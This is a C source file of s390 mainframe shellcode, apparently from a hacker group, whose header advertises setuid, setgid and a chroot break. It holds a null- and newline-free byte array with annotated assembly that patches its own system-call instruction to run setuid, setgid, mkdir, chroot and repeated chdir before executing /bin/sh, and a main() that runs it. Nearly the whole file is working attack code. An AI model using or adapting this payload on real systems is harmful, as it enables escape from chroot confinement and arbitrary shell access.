/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* setuid / setgid / chroot break */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,0 */
"\x41\x90\x10\x98" /* la %r9,152(%r1) */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x98" /* stc %r6,152(%r1) */
"\x17\x22" /* xr %r2,%r2 */
"\x42\x20\x10\x9f" /* stc %r2,159(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x7a" /* lhi %r6,1146 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\x17\x33" /* xr %r3,%r3 */
"\xa7\x68\x04\x73" /* lhi %r6,1139 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\xb8\x05\x39" /* lhi %r11,1337 */
"\x1a\xba" /* ar %r11,%r10 */
"\xa7\x68\x04\x58" /* lhi %r6,1112 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\x9d" /* la %r2,157(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x46\xb0\x10\x58" /* bct %r11,88(%r1) */
"\x41\x20\x10\x9e" /* la %r2,158(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\xa0" /* la %r2,160(%r1) */
"\x50\x20\x10\xa8" /* st %r2,168(%r1) */
"\x41\x30\x10\xa8" /* la %r3,168(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xa7" /* stc %r4,167(%r1) */
"\x50\x40\x10\xac" /* st %r4,172(%r1) */
"\x41\x40\x10\xac" /* la %r4,172(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x17" /* svc 23 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x41\x2e\x2e\x5c" /* A.. <---- used for mkdir,chroot,chdir */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}